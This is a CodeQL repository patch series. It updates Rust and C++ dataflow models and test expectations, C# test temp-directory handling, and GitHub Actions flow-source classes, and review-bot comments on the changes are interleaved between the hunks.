| +| main.rs:139:10:139:31 | get_array_element(...) | semmle.label | get_array_element(...) | +| main.rs:139:10:139:31 | get_array_element(...) | semmle.label | get_array_element(...) | +| main.rs:139:28:139:30 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:139:28:139:30 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:139:29:139:29 | s | semmle.label | s | +| main.rs:139:29:139:29 | s | semmle.label | s | +| main.rs:148:13:148:21 | source(...) | semmle.label | source(...) | +| main.rs:148:13:148:21 | source(...) | semmle.label | source(...) | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | semmle.label | set_array_element(...) [array[]] | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | semmle.label | set_array_element(...) 
[array[]] | +| main.rs:149:33:149:33 | s | semmle.label | s | +| main.rs:149:33:149:33 | s | semmle.label | s | +| main.rs:150:10:150:12 | arr [array[]] | semmle.label | arr [array[]] | +| main.rs:150:10:150:12 | arr [array[]] | semmle.label | arr [array[]] | +| main.rs:150:10:150:15 | arr[0] | semmle.label | arr[0] | +| main.rs:150:10:150:15 | arr[0] | semmle.label | arr[0] | +| main.rs:159:13:159:22 | source(...) | semmle.label | source(...) | +| main.rs:159:13:159:22 | source(...) | semmle.label | source(...) | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | +| main.rs:160:14:160:14 | s | semmle.label | s | +| main.rs:160:14:160:14 | s | semmle.label | s | +| main.rs:161:10:161:29 | get_tuple_element(...) | semmle.label | get_tuple_element(...) | +| main.rs:161:10:161:29 | get_tuple_element(...) | semmle.label | get_tuple_element(...) | +| main.rs:161:28:161:28 | t [tuple.0] | semmle.label | t [tuple.0] | +| main.rs:161:28:161:28 | t [tuple.0] | semmle.label | t [tuple.0] | +| main.rs:172:13:172:22 | source(...) | semmle.label | source(...) | +| main.rs:172:13:172:22 | source(...) | semmle.label | source(...) | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | semmle.label | set_tuple_element(...) [tuple.1] | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | semmle.label | set_tuple_element(...) [tuple.1] | +| main.rs:173:31:173:31 | s | semmle.label | s | +| main.rs:173:31:173:31 | s | semmle.label | s | +| main.rs:175:10:175:10 | t [tuple.1] | semmle.label | t [tuple.1] | +| main.rs:175:10:175:10 | t [tuple.1] | semmle.label | t [tuple.1] | +| main.rs:175:10:175:12 | t.1 | semmle.label | t.1 | +| main.rs:175:10:175:12 | t.1 | semmle.label | t.1 | subpaths testFailures invalidSpecComponent 
@@ -111,3 +208,13 @@ invalidSpecComponent | main.rs:74:10:74:26 | get_var_field(...) | main.rs:72:13:72:21 | source(...) | main.rs:74:10:74:26 | get_var_field(...) | $@ | main.rs:72:13:72:21 | source(...) | source(...) | | main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | | main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | +| main.rs:109:10:109:36 | get_struct_field(...) | main.rs:104:13:104:21 | source(...) | main.rs:109:10:109:36 | get_struct_field(...) | $@ | main.rs:104:13:104:21 | source(...) | source(...) | +| main.rs:109:10:109:36 | get_struct_field(...) | main.rs:104:13:104:21 | source(...) | main.rs:109:10:109:36 | get_struct_field(...) | $@ | main.rs:104:13:104:21 | source(...) | source(...) | +| main.rs:139:10:139:31 | get_array_element(...) | main.rs:138:13:138:21 | source(...) | main.rs:139:10:139:31 | get_array_element(...) | $@ | main.rs:138:13:138:21 | source(...) | source(...) | +| main.rs:139:10:139:31 | get_array_element(...) | main.rs:138:13:138:21 | source(...) | main.rs:139:10:139:31 | get_array_element(...) | $@ | main.rs:138:13:138:21 | source(...) | source(...) | +| main.rs:150:10:150:15 | arr[0] | main.rs:148:13:148:21 | source(...) | main.rs:150:10:150:15 | arr[0] | $@ | main.rs:148:13:148:21 | source(...) | source(...) | +| main.rs:150:10:150:15 | arr[0] | main.rs:148:13:148:21 | source(...) | main.rs:150:10:150:15 | arr[0] | $@ | main.rs:148:13:148:21 | source(...) | source(...) | +| main.rs:161:10:161:29 | get_tuple_element(...) | main.rs:159:13:159:22 | source(...) | main.rs:161:10:161:29 | get_tuple_element(...) | $@ | main.rs:159:13:159:22 | source(...) | source(...) | +| main.rs:161:10:161:29 | get_tuple_element(...) | main.rs:159:13:159:22 | source(...) | main.rs:161:10:161:29 | get_tuple_element(...) | $@ | main.rs:159:13:159:22 | source(...) 
| source(...) | +| main.rs:175:10:175:12 | t.1 | main.rs:172:13:172:22 | source(...) | main.rs:175:10:175:12 | t.1 | $@ | main.rs:172:13:172:22 | source(...) | source(...) | +| main.rs:175:10:175:12 | t.1 | main.rs:172:13:172:22 | source(...) | main.rs:175:10:175:12 | t.1 | $@ | main.rs:172:13:172:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/models/models.ext.yml b/rust/ql/test/library-tests/dataflow/models/models.ext.yml new file mode 100644 index 00000000000..80a19b3e8da --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/models/models.ext.yml 
@@ -0,0 +1,17 @@
+extensions:
+ - addsTo:
+ pack: codeql/rust-all
+ extensible: summaryModel
+ data:
+ - ["repo::test", "crate::identity", "Argument[0]", "ReturnValue", "value", "manual"]
+ - ["repo::test", "crate::coerce", "Argument[0]", "ReturnValue", "taint", "manual"]
+ - ["repo::test", "crate::get_var_pos", "Argument[0].Variant[crate::MyPosEnum::A(0)]", "ReturnValue", "value", "manual"]
+ - ["repo::test", "crate::set_var_pos", "Argument[0]", "ReturnValue.Variant[crate::MyPosEnum::B(0)]", "value", "manual"]
+ - ["repo::test", "crate::get_var_field", "Argument[0].Variant[crate::MyFieldEnum::C::field_c]", "ReturnValue", "value", "manual"]
+ - ["repo::test", "crate::set_var_field", "Argument[0]", "ReturnValue.Variant[crate::MyFieldEnum::D::field_d]", "value", "manual"]
+ - ["repo::test", "crate::get_struct_field", "Argument[0].Struct[crate::MyStruct::field1]", "ReturnValue", "value", "manual"]
+ - ["repo::test", "crate::set_struct_field", "Argument[0]", "ReturnValue.Struct[crate::MyStruct::field2]", "value", "manual"]
+ - ["repo::test", "crate::get_array_element", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"]
+ - ["repo::test", "crate::set_array_element", "Argument[0]", "ReturnValue.ArrayElement", "value", "manual"]
+ - ["repo::test", "crate::get_tuple_element", "Argument[0].Tuple[0]", "ReturnValue", "value", "manual"]
+ - ["repo::test", "crate::set_tuple_element", "Argument[0]", "ReturnValue.Tuple[1]", "value", "manual"]
diff --git a/rust/ql/test/library-tests/dataflow/models/models.ql b/rust/ql/test/library-tests/dataflow/models/models.ql
index 53c3f5de4be..10d2f9f91b7 100644
--- a/rust/ql/test/library-tests/dataflow/models/models.ql
+++ b/rust/ql/test/library-tests/dataflow/models/models.ql
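Review bot: The `data:` rows in the new models.ext.yml carry no column legend, so a reader has to infer what each of the six positions means. The C++ model files touched later in this series put one directly under `data:`; the same would help here, presumably `# crate, path, input, output, kind, provenance` (confirm the column names against the Rust `summaryModel` extensible predicate). A second one-line comment noting that `crate::coerce` is the only row of kind `taint`, while every other row is value-preserving, would make the intent of that row explicit for whoever extends the test.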
@@ -15,66 +15,6 @@ query predicate invalidSpecComponent(SummarizedCallable sc, string s, string c) Private::External::invalidSpecComponent(s, c) } -private class SummarizedCallableIdentity extends SummarizedCallable::Range { - SummarizedCallableIdentity() { this = "repo::test::_::crate::identity" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue" and - preservesValue = true - } -} - -private class SummarizedCallableCoerce extends SummarizedCallable::Range { - SummarizedCallableCoerce() { this = "repo::test::_::crate::coerce" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue" and - preservesValue = false - } -} - -private class SummarizedCallableGetVarPos extends SummarizedCallable::Range { - SummarizedCallableGetVarPos() { this = "repo::test::_::crate::get_var_pos" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0].Variant[crate::MyPosEnum::A(0)]" and - output = "ReturnValue" and - preservesValue = true - } -} - -private class SummarizedCallableSetVarPos extends SummarizedCallable::Range { - SummarizedCallableSetVarPos() { this = "repo::test::_::crate::set_var_pos" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue.Variant[crate::MyPosEnum::B(0)]" and - preservesValue = true - } -} - -private class SummarizedCallableGetVarField extends SummarizedCallable::Range { - SummarizedCallableGetVarField() { this = "repo::test::_::crate::get_var_field" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0].Variant[crate::MyFieldEnum::C::field_c]" and - output = "ReturnValue" and - preservesValue = true - } -} - -private class SummarizedCallableSetVarField extends 
SummarizedCallable::Range { - SummarizedCallableSetVarField() { this = "repo::test::_::crate::set_var_field" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue.Variant[crate::MyFieldEnum::D::field_d]" and - preservesValue = true - } -} - module CustomConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { DefaultFlowConfig::isSource(source) } diff --git a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref index 504d27ff30c..7aee10fcc4a 100644 --- a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref +++ b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref @@ -1,2 +1,4 @@ query: queries/security/CWE-089/SqlInjection.ql -postprocess: utils/InlineExpectationsTestQuery.ql +postprocess: + - utils/PrettyPrintModels.ql + - utils/InlineExpectationsTestQuery.ql diff --git a/rust/ql/test/utils/InlineFlowTest.qll b/rust/ql/test/utils/InlineFlowTest.qll index dcf8ad8c445..cb5b9f72abb 100644 --- a/rust/ql/test/utils/InlineFlowTest.qll +++ b/rust/ql/test/utils/InlineFlowTest.qll @@ -9,6 +9,7 @@ private import codeql.rust.controlflow.CfgNodes private import codeql.rust.dataflow.DataFlow private import codeql.rust.dataflow.internal.DataFlowImpl private import codeql.rust.dataflow.internal.TaintTrackingImpl +private import codeql.rust.dataflow.internal.ModelsAsData as MaD private import internal.InlineExpectationsTestImpl as InlineExpectationsTestImpl // Holds if the target expression of `call` is a path and the string representation of the path is `name`. @@ -38,7 +39,7 @@ private module FlowTestImpl implements InputSig { exists(sink) } - predicate interpretModelForTest(QlBuiltins::ExtensionId madId, string model) { none() } + predicate interpretModelForTest = MaD::interpretModelForTest/2; } import InlineFlowTestMake 
diff --git a/rust/ql/test/utils/PrettyPrintModels.ql b/rust/ql/test/utils/PrettyPrintModels.ql new file mode 100644 index 00000000000..9740f20433f --- /dev/null +++ b/rust/ql/test/utils/PrettyPrintModels.ql @@ -0,0 +1,7 @@ +/** + * @kind test-postprocess + */ + +import codeql.rust.dataflow.internal.ModelsAsData +import codeql.dataflow.test.ProvenancePathGraph +import codeql.dataflow.test.ProvenancePathGraph::TestPostProcessing::TranslateProvenanceResults diff --git a/rust/ql/test/utils/ProvenancePathGraph.qll b/rust/ql/test/utils/ProvenancePathGraph.qll new file mode 100644 index 00000000000..fd5b771941d --- /dev/null +++ b/rust/ql/test/utils/ProvenancePathGraph.qll @@ -0,0 +1,8 @@ +private import codeql.dataflow.DataFlow as DF +private import codeql.dataflow.test.ProvenancePathGraph as Graph +private import codeql.rust.dataflow.internal.ModelsAsData + +/** Transforms a `PathGraph` by printing the provenance information. */ +module ShowProvenance PathGraph> { + import Graph::ShowProvenance +} From 5624a77176db4fe7d36038d7ce6204970d2c5337 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 13:59:01 +0100 Subject: [PATCH 0923/1267] C#: Use TEST_TEMPDIR when set for test files. --- csharp/extractor/Semmle.Util.Tests/LongPaths.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs index 1c0d5e2ce13..c1583e27503 100644 --- a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs +++ b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs 
@@ -12,7 +12,7 @@ namespace SemmleTests.Semmle.Util /// public sealed class LongPaths : IDisposable { - private static readonly string tmpDir = Path.GetTempPath(); + private static readonly string tmpDir = Environment.GetEnvironmentVariable("TEST_TMPDIR") ?? Path.GetTempPath(); private static readonly string shortPath = Path.Combine(tmpDir, "test.txt"); private static readonly string longPath = Path.Combine(tmpDir, "aaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "ccccccccccccccccccccccccccccccc", "ddddddddddddddddddddddddddddddddddddd", "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", "fffffffffffffffffffffffffffffffff", From d735a1433bc1b8cf363c484923e1ed8983e0afc6 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:23:15 +0000 Subject: [PATCH 0924/1267] C++: Also flow to the return value of 'operator='. --- cpp/ql/lib/ext/CSimpleArray.model.yml | 3 ++- .../dataflow/external-models/flow.expected | 10 +++++----- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/cpp/ql/lib/ext/CSimpleArray.model.yml b/cpp/ql/lib/ext/CSimpleArray.model.yml index 1c6337bf74c..8daae929651 100644 --- a/cpp/ql/lib/ext/CSimpleArray.model.yml +++ b/cpp/ql/lib/ext/CSimpleArray.model.yml 
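Review bot: An empty `TEST_TMPDIR` is not covered by the fallback on the new `tmpDir` line, because `??` only replaces null. Where the runtime returns a set-but-empty variable as an empty string, `Path.Combine("", "test.txt")` yields a relative path and the test files are created in the current directory rather than in a temp directory. Checking for empty as well keeps the files in a known location: `private static readonly string tmpDir = Environment.GetEnvironmentVariable("TEST_TMPDIR") is { Length: > 0 } dir ? dir : Path.GetTempPath();`. The commit subject names `TEST_TEMPDIR` while the code reads `TEST_TMPDIR`, so one of the two is presumably a typo. The class body continues outside the hunk.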
@@ -8,4 +8,5 @@ extensions: - ["", "CSimpleArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CSimpleArray", True, "SetAtIndex", "", "", "Argument[*1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CSimpleArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] \ No newline at end of file + - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "ReturnValue[*].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 8930cadb8d8..81a9c605f00 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:799 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:797 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:798 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:798 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:799 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | From d3dc318ba1504c4e74874efe5e9d118ea5dd8784 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:26:46 +0000 Subject: [PATCH 0925/1267] C++: Make 'GetValueAt' a value-preserving step. --- cpp/ql/lib/ext/CSimpleMap.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CSimpleMap.model.yml b/cpp/ql/lib/ext/CSimpleMap.model.yml index 323b5be0174..814e814228e 100644 --- a/cpp/ql/lib/ext/CSimpleMap.model.yml +++ b/cpp/ql/lib/ext/CSimpleMap.model.yml @@ -4,7 +4,7 @@ extensions: extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - ["", "CSimpleMap", True, "Add", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "taint", "manual"] + - ["", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CSimpleMap", True, "Lookup", "", "", "Argument[-1].Element[@]", "ReturnValue.Element[@]", "value", "manual"] - ["", "CSimpleMap", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CSimpleMap", True, "SetAtIndex", "", "", "Argument[*@2]", "Argument[-1].Element[@]", "value", "manual"] From 1fa00f106532e3db0457368d78a9f187ac9d61ee Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 14:31:10 +0100 Subject: [PATCH 0926/1267] Capture the event name rathen than the whole event --- .../codeql/actions/dataflow/FlowSources.qll | 52 ++++++++++--------- .../Security/CWE-094/CodeInjectionCritical.ql | 2 +- 2 files changed, 28 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index cf1763b1c03..9259f18f108 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll 
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,22 +19,26 @@ abstract class RemoteFlowSource extends SourceNode { abstract string getSourceType(); /** Gets the event that triggered the source. */ - abstract Event getEvent(); + abstract string getEventName(); override string getThreatModel() { result = "remote" } } +/** + * A data flow source of user input from github context. + * eg: github.head_ref + */ class GitHubCtxSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(event.getName(), context_prefix) and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) @@ -42,23 +46,23 @@ class GitHubCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; - Event event; + string event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent() and + event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or 
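Review bot: The QLDoc kept above the renamed member of `RemoteFlowSource` still reads `/** Gets the event that triggered the source. */`, although `getEventName()` now returns a string; it should become `/** Gets the name of the event that triggered the source. */`. Replacing the abstract `getEvent()` rather than adding `getEventName()` beside it is also an interface break: any subclass or query outside this commit that still overrides or calls `getEvent()` stops compiling, and only CodeInjectionCritical.ql is updated here, so the other security queries in the pack are worth checking. `GitHubCtxSource` gains a class comment in this hunk, but `GitHubEventCtxSource` and `GitHubEventJsonSource` in the following hunks do not, and a one-line comment with an example context on each would match it. The class bodies continue outside the hunks.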
@@ -74,7 +78,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { string getContext() { result = context } - override Event getEvent() { result = event } + override string getEventName() { result = event } } abstract class CommandSource extends RemoteFlowSource { @@ -82,7 +86,7 @@ abstract class CommandSource extends RemoteFlowSource { abstract Run getEnclosingRun(); - override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } + override string getEventName() { result = this.getEnclosingRun().getATriggerEvent().getName() } } class GitCommandSource extends RemoteFlowSource, CommandSource { @@ -172,19 +176,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -199,7 +203,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } /** 
@@ -212,7 +216,7 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } abstract class FileSource extends RemoteFlowSource { } @@ -225,20 +229,18 @@ class ArtifactSource extends RemoteFlowSource, FileSource { override string getSourceType() { result = "artifact" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { - Event event; - CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } override string getSourceType() { result = "artifact" } - override Event getEvent() { result = event } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -255,7 +257,7 @@ class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -278,7 +280,7 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** 
@@ -301,7 +303,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { @@ -315,7 +317,7 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { @@ -329,7 +331,7 @@ class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -352,5 +354,5 @@ class OctokitRequestActionSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index b52c0702344..c4ab00837ca 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
@@ -23,7 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and - source.getNode().(RemoteFlowSource).getEvent() = event and + source.getNode().(RemoteFlowSource).getEventName() = event.getName() and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | From db86f6aaf92b33bed3fb0d8da9535b353cb28ee4 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:32:22 +0000 Subject: [PATCH 0927/1267] C++: Fix annotation. --- cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 9a57fd604a5..0e70a101620 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -785,7 +785,7 @@ void test_CSimpleMap() { { CSimpleMap a; auto pos = a.FindKey("hello"); - sink(a.GetValueAt(pos)); // $ MISSING: ir + sink(a.GetValueAt(pos)); // clean } { CSimpleMap a; From 674dbce36d71d284790d6ecc1864a7887424d835 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:38:37 +0000 Subject: [PATCH 0928/1267] C++: Add taint flow through 'CRegKey::Create'. --- cpp/ql/lib/ext/CRegKey.model.yml | 1 + .../dataflow/external-models/flow.expected | 10 +++++----- 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 45114347ee0..84d85c40a01 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml 
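Review bot: The `where` clause now ties the source to the privileged context by trigger name only, `source.getNode().(RemoteFlowSource).getEventName() = event.getName()`, so two distinct `Event` values that share a name are treated as the same trigger. That looks intended, presumably so a source and a sink that see different `Event` values for one trigger still match, but it also means the `ControlCheck` on the following line is evaluated for the sink-side `event` only, which may not be the trigger the source was actually reached on. A comment on the changed line would record the decision, for example `// compared by name: source and sink may bind different Event values for the same trigger`. A test with two workflows that declare the same trigger, one protected and one not, would show whether the broader match adds alerts. The rest of the query lies outside the hunk.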
@@ -5,6 +5,7 @@ extensions: data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - ["", "CRegKey", True, "CRegKey", "(CRegKey &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CRegKey", True, "Create", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 81a9c605f00..137642d522a 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
